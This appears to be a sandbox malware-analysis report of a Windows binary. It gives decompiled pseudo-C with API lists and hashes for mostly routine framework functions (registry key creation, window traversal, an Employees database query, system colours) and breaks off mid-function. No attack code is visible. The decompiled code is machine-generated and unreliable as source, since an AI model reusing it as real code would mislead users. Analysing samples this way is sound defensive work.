                                                                              			E0042DE78(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x45a0f4
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					_push(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E0042DB64(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E0042DDCA(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x5ae160
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E00422EAF(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E00412140(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						_push(_v8);
					}
				}
				LeaveCriticalSection();
				return _t32;
			}












                                                                              0x0042de7b
                                                                              0x0042de7f
                                                                              0x0042de81
                                                                              0x0042de81
                                                                              0x0042de85
                                                                              0x0042de88
                                                                              0x0042de8e
                                                                              0x0042de95
                                                                              0x0042df71
                                                                              0x0042df71
                                                                              0x0042de9b
                                                                              0x0042de9b
                                                                              0x0042de9e
                                                                              0x00000000
                                                                              0x0042dea4
                                                                              0x0042deac
                                                                              0x0042deb0
                                                                              0x0042ded2
                                                                              0x0042dedf
                                                                              0x0042ded4
                                                                              0x0042dedb
                                                                              0x0042dedb
                                                                              0x0042dee1
                                                                              0x0042dee4
                                                                              0x0042dee7
                                                                              0x0042dee7
                                                                              0x0042deea
                                                                              0x0042deed
                                                                              0x0042def0
                                                                              0x00000000
                                                                              0x0042deb2
                                                                              0x0042deb2
                                                                              0x0042deb8
                                                                              0x0042def3
                                                                              0x0042def3
                                                                              0x0042def8
                                                                              0x0042df0a
                                                                              0x0042df0f
                                                                              0x0042df14
                                                                              0x0042defa
                                                                              0x0042defa
                                                                              0x0042df02
                                                                              0x0042df02
                                                                              0x0042df1c
                                                                              0x0042df21
                                                                              0x0042df27
                                                                              0x0042df27
                                                                              0x0042df2f
                                                                              0x0042df32
                                                                              0x0042df40
                                                                              0x0042df45
                                                                              0x0042df4c
                                                                              0x0042df51
                                                                              0x0042df57
                                                                              0x0042df57
                                                                              0x0042deb8
                                                                              0x0042df5a
                                                                              0x0042df5f
                                                                              0x0042df69
                                                                              0x0042df69
                                                                              0x0042df6c
                                                                              0x0042df6c
                                                                              0x0042de9e
                                                                              0x0042df72
                                                                              0x0042df7c

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0045A0F4,00000000,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4), ref: 0042DE88
                                                                              • TlsGetValue.KERNEL32(0045A0D8,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA), ref: 0042DEA6
                                                                              • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D), ref: 0042DF02
                                                                              • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188), ref: 0042DF14
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA), ref: 0042DF21
                                                                              • TlsSetValue.KERNEL32(0045A0D8,00000000), ref: 0042DF51
                                                                              • LeaveCriticalSection.KERNEL32(0045A0F4,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA), ref: 0042DF72
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                              • String ID:
                                                                              • API String ID: 784703316-0
                                                                              • Opcode ID: e7df2054bc604726881da26f1eb46b2c7e2244ca5358edf6b23d3a65cd685603
                                                                              • Instruction ID: fcd6035f0b90d21c0d9d6da7d37b9e3363e18cffba046e8fe3cae58999833390
                                                                              • Opcode Fuzzy Hash: e7df2054bc604726881da26f1eb46b2c7e2244ca5358edf6b23d3a65cd685603
                                                                              • Instruction Fuzzy Hash: 0931BC70A00625EFCB24EF55EA84C6ABBA9FF04310751C52EE516C7610CB74BD54CB98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00410A99, Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E00410A99(void* __ebx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E00426406(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0 || E00428444(_t42) != 0) {
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							} else {
								goto L12;
							}
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E00410A99(_t37);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E00426406(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E00410A44(_t45, E00426406(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E00426406(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E00426406(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}












                                                                              0x00410a99
                                                                              0x00410a9b
                                                                              0x00410aa2
                                                                              0x00410b42
                                                                              0x00410b46
                                                                              0x00410b55
                                                                              0x00410b59
                                                                              0x00410b04
                                                                              0x00410b14
                                                                              0x00410b6b
                                                                              0x00000000
                                                                              0x00410b6b
                                                                              0x00410b16
                                                                              0x00410b17
                                                                              0x00410b1e
                                                                              0x00410b30
                                                                              0x00410b5f
                                                                              0x00410b60
                                                                              0x00410b62
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00410b3d
                                                                              0x00410b3d
                                                                              0x00410b3d
                                                                              0x00410b3e
                                                                              0x00410b3f
                                                                              0x00410b63
                                                                              0x00410b68
                                                                              0x00000000
                                                                              0x00410b6a
                                                                              0x00410b1e
                                                                              0x00000000
                                                                              0x00410b5b
                                                                              0x00410ab7
                                                                              0x00410abc
                                                                              0x00410af0
                                                                              0x00410ad8
                                                                              0x00410adc
                                                                              0x00000000
                                                                              0x00410ae2
                                                                              0x00410aeb
                                                                              0x00000000
                                                                              0x00410aeb
                                                                              0x00410adc
                                                                              0x00410b02
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongParentVisible
                                                                              • String ID:
                                                                              • API String ID: 506644340-0
                                                                              • Opcode ID: e9847245f9dd1eaff5567f8393f1fb1938c220977b46e8526e5ed735ee370d9b
                                                                              • Instruction ID: 3d9ca9c5c6fd9efd1b326305b11bfc860187603153bae37d8cc92170700b868b
                                                                              • Opcode Fuzzy Hash: e9847245f9dd1eaff5567f8393f1fb1938c220977b46e8526e5ed735ee370d9b
                                                                              • Instruction Fuzzy Hash: EE21D331A047356BC730BBA59D09FAB72ACAF40758F15052AF942D7252C6ACECC1866C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040737D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E0040737D(void* __eflags) {
				void* _t31;
				void* _t33;
				void* _t44;
				void* _t47;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;

				E004128A0(E00430AE8, _t51);
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0x2c;
				__imp__CoInitialize(0, _t44, _t47, _t33);
				_push("DRIVER={Microsoft Access Driver (*.mdb)};UID=admin;DBQ=ab.mdb;pwd= x;");
				 *((intOrPtr*)(_t51 - 4)) = 0;
				E0040678C(_t51 - 0x14);
				 *((char*)(_t51 - 4)) = 1;
				E004070AE(0x458420, 0x448e5c, 0, 0x17);
				E00406837(_t51 - 0x34, _t51 - 0x14);
				 *((char*)(_t51 - 4)) = 2;
				 *((short*)(_t51 - 0x24)) = 8;
				 *((intOrPtr*)(_t51 - 0x1c)) = E0041FCB0(_t51 - 0x34, "select * from Employees");
				 *((char*)(_t51 - 4)) = 3;
				E0040642C(E0040669E(0x458420), _t51 - 0x24, _t51 - 0x34, 2, 3, 1);
				_t49 = __imp__#9;
				_push(_t51 - 0x24);
				 *((char*)(_t51 - 4)) = 2;
				if( *_t49() < 0) {
					E0041FC30(_t29);
				}
				 *((char*)(_t51 - 4)) = 1;
				_t31 =  *_t49(_t51 - 0x34);
				if(_t31 < 0) {
					_t31 = E0041FC30(_t31);
				}
				_t42 =  *((intOrPtr*)(_t51 - 0x14));
				if( *((intOrPtr*)(_t51 - 0x14)) != 0) {
					_t31 = E004069A2(_t42);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t31;
			}










                                                                              0x00407382
                                                                              0x0040738d
                                                                              0x00407393
                                                                              0x00407399
                                                                              0x004073a1
                                                                              0x004073a4
                                                                              0x004073b8
                                                                              0x004073bc
                                                                              0x004073c8
                                                                              0x004073d2
                                                                              0x004073d6
                                                                              0x004073e1
                                                                              0x004073e6
                                                                              0x004073ff
                                                                              0x00407404
                                                                              0x0040740d
                                                                              0x0040740e
                                                                              0x00407416
                                                                              0x00407419
                                                                              0x00407419
                                                                              0x00407422
                                                                              0x00407426
                                                                              0x0040742a
                                                                              0x0040742d
                                                                              0x0040742d
                                                                              0x00407432
                                                                              0x00407437
                                                                              0x00407439
                                                                              0x00407439
                                                                              0x00407443
                                                                              0x0040744c

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407382
                                                                              • CoInitialize.OLE32(00000000), ref: 00407393
                                                                                • Part of subcall function 0040678C: __EH_prolog.LIBCMT ref: 00406791
                                                                                • Part of subcall function 004070AE: CoCreateInstance.OLE32(?,?,00000014,00448E34,00000014), ref: 004070D9
                                                                                • Part of subcall function 004070AE: OleRun.OLE32(00000014), ref: 004070E8
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407412
                                                                              • VariantClear.OLEAUT32(?), ref: 00407426
                                                                              Strings
                                                                              • select * from Employees, xrefs: 004073CD
                                                                              • DRIVER={Microsoft Access Driver (*.mdb)};UID=admin;DBQ=ab.mdb;pwd= x;, xrefs: 00407399
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearH_prologVariant$ByteCharCreateInitializeInstanceMultiWidelstrlen
                                                                              • String ID: DRIVER={Microsoft Access Driver (*.mdb)};UID=admin;DBQ=ab.mdb;pwd= x;$select * from Employees
                                                                              • API String ID: 3912264618-3282461135
                                                                              • Opcode ID: 3ac2a3df578e013ff68d09e7b8251b3a1f1c6b42d2216e3b047b35a738743346
                                                                              • Instruction ID: f27dd1b74bafac8b90960d19ba72acee16fef208574680e4330fb597fe6c53cb
                                                                              • Opcode Fuzzy Hash: 3ac2a3df578e013ff68d09e7b8251b3a1f1c6b42d2216e3b047b35a738743346
                                                                              • Instruction Fuzzy Hash: 72218671D01108AADB05E7A5C946BEEBBB99F54708F20406EE005B31C2DAB81F0587AA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DA8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042DA8D(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                              0x0042daa8
                                                                              0x0042daaf
                                                                              0x0042dab2
                                                                              0x0042dab5
                                                                              0x0042dab8
                                                                              0x0042dac3
                                                                              0x0042dafa
                                                                              0x0042dafa
                                                                              0x0042db05
                                                                              0x0042db0a
                                                                              0x0042db0a
                                                                              0x0042db0f
                                                                              0x0042db14
                                                                              0x0042db14
                                                                              0x0042db1d

                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 0042DABB
                                                                              • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042DADE
                                                                              • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042DAFA
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042DB0A
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042DB14
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreate$Open
                                                                              • String ID: software
                                                                              • API String ID: 1740278721-2010147023
                                                                              • Opcode ID: b7a42afbcb34ec79f36ee597c1f33b52f4541bd785ce39960d6878fdf435229d
                                                                              • Instruction ID: 4ee22ab72d24d09348f149714e63517df5d5f11a14ade9983ccd04d75f93fc96
                                                                              • Opcode Fuzzy Hash: b7a42afbcb34ec79f36ee597c1f33b52f4541bd785ce39960d6878fdf435229d
                                                                              • Instruction Fuzzy Hash: CE110A72D00158FBDB21DF9ADD84DDFFFBCEF85704B1040AAA500A2111D3B1AA04DBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00409286, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E00409286(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E004090D5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x459e20(_a4, _a8);
			}







                                                                              0x00409293
                                                                              0x004092ac
                                                                              0x00409313
                                                                              0x00409313
                                                                              0x00409315
                                                                              0x00000000
                                                                              0x00409316
                                                                              0x004092ae
                                                                              0x004092b5
                                                                              0x00000000
                                                                              0x004092ce
                                                                              0x004092cf
                                                                              0x004092d2
                                                                              0x004092e0
                                                                              0x004092e3
                                                                              0x004092eb
                                                                              0x004092ec
                                                                              0x004092ed
                                                                              0x004092ee
                                                                              0x004092f5
                                                                              0x004092f8
                                                                              0x004092fc
                                                                              0x00409309
                                                                              0x00409309
                                                                              0x0040930f
                                                                              0x00000000
                                                                              0x0040930f
                                                                              0x004092b5
                                                                              0x00000000

                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004092C4
                                                                              • GetSystemMetrics.USER32 ref: 004092DC
                                                                              • GetSystemMetrics.USER32 ref: 004092E3
                                                                              • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00409309
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                              • String ID: B$DISPLAY
                                                                              • API String ID: 2307409384-3316187204
                                                                              • Opcode ID: 2d623e82beffbccdb7c4101a6abd0e9f4ed7abb956328d8292387862a8d20a1b
                                                                              • Instruction ID: 03c86ae7b3915281e7d1f590234124227337600624625df3b521cb5599ec9481
                                                                              • Opcode Fuzzy Hash: 2d623e82beffbccdb7c4101a6abd0e9f4ed7abb956328d8292387862a8d20a1b
                                                                              • Instruction Fuzzy Hash: A111A371601224EBCF219F64DC84A5BBBA8EF49751B008072FC05BA1D6C2B9DD01CFA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428B87, Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00428B87(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                              0x00428b91
                                                                              0x00428b97
                                                                              0x00428b9e
                                                                              0x00428ba5
                                                                              0x00428bac
                                                                              0x00428bb9
                                                                              0x00428bc0
                                                                              0x00428bc3
                                                                              0x00428bc6
                                                                              0x00428bca

                                                                              APIs
                                                                              • GetSysColor.USER32(0000000F), ref: 00428B93
                                                                              • GetSysColor.USER32(00000010), ref: 00428B9A
                                                                              • GetSysColor.USER32(00000014), ref: 00428BA1
                                                                              • GetSysColor.USER32(00000012), ref: 00428BA8
                                                                              • GetSysColor.USER32(00000006), ref: 00428BAF
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00428BBC
                                                                              • GetSysColorBrush.USER32(00000006), ref: 00428BC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Brush
                                                                              • String ID:
                                                                              • API String ID: 2798902688-0
                                                                              • Opcode ID: a19c6dd821970c4584db9dd8733942771fc38e351c1d522927b3d658aa7fd6f2
                                                                              • Instruction ID: 70cba862a80adb0bed28b41b8c2963372d46e51a90eda20a743410cf0b67a23e
                                                                              • Opcode Fuzzy Hash: a19c6dd821970c4584db9dd8733942771fc38e351c1d522927b3d658aa7fd6f2
                                                                              • Instruction Fuzzy Hash: BAF0F8719407489BD730BBB29D09B47BAE1EFC4B10F02192AD2818BA90E6B6E0409F44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C258, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042C258() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x45a370 =  *0x45a370 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x45a370 = _t6;
					return _t6;
				}
			}





                                                                              0x0042c269
                                                                              0x0042c273
                                                                              0x0042c277
                                                                              0x0042c293
                                                                              0x0042c293
                                                                              0x00000000
                                                                              0x0042c293
                                                                              0x0042c279
                                                                              0x0042c27f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c281
                                                                              0x0042c281
                                                                              0x0042c286
                                                                              0x0042c28c
                                                                              0x00000000
                                                                              0x0042c28c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Version$MessageRegisterWindow
                                                                              • String ID: MSWHEEL_ROLLMSG
                                                                              • API String ID: 303823969-2485103130
                                                                              • Opcode ID: 4046f56fa4d78d7e5a9d89c34266bd5c8eda0f22f934f8979b7f3b537493b9b2
                                                                              • Instruction ID: 1f6d470c0d54ed8debbc4a9dad43178b17367c804212208b4abd6f476afa8102
                                                                              • Opcode Fuzzy Hash: 4046f56fa4d78d7e5a9d89c34266bd5c8eda0f22f934f8979b7f3b537493b9b2
                                                                              • Instruction Fuzzy Hash: 85E08039D40233C6D71127F8BD4035E26945B59351F9141F7DD00432545F7C484346BE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00410097, Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E00410097(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E004128A0(E004312D8, _t327);
				_t155 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E0041162C(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E0040DC9A( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E0040C98C(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
